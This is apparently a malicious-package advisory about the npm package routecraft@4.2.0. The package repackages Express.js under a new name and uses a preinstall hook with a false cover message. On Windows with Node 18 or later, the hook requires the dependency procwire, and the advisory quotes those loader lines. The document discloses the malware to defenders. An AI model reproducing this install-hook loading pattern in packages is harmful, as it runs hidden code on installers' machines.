MAL-2026-6229

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (a0c4f17a9e94ab9fdbab7325f597551a6c0ba5b9e210cb0b7e28d3b86b4766d0) routecraft@4.2.0 ships verbatim Express.js source (lib/routecraft.js, lib/application.js, lib/request.js, lib/response.js, lib/utils.js, lib/view.js — same layout, comments, and exports including createApplication, Router, and json/raw/text/urlencoded/static middleware) under a different package name and author with no Express attribution, presenting itself as an original 'lightweight HTTP routing framework'. package.json declares `"preinstall": "node./lib/configure.js"`. lib/configure.js performs no compilation despite logging '...Skipping native addon compilation' — the package ships no native sources (no binding.gyp, no.cc/.cpp/.rs files). Instead, lines 10-12 contain `if (os.platform() === 'win32' && v >= 18) { require('procwire'); }`, conditionally loading the obscure `procwire` dependency (declared as `^1.3.0`) only on Windows with Node >= 18. The false cover story, the platform gate, and the delegation of the executed code to an unpinned transitive dependency together form the standard pattern for shifting a malicious payload off the parent package so it appears clean while installers on Windows execute whatever procwire ships at install time.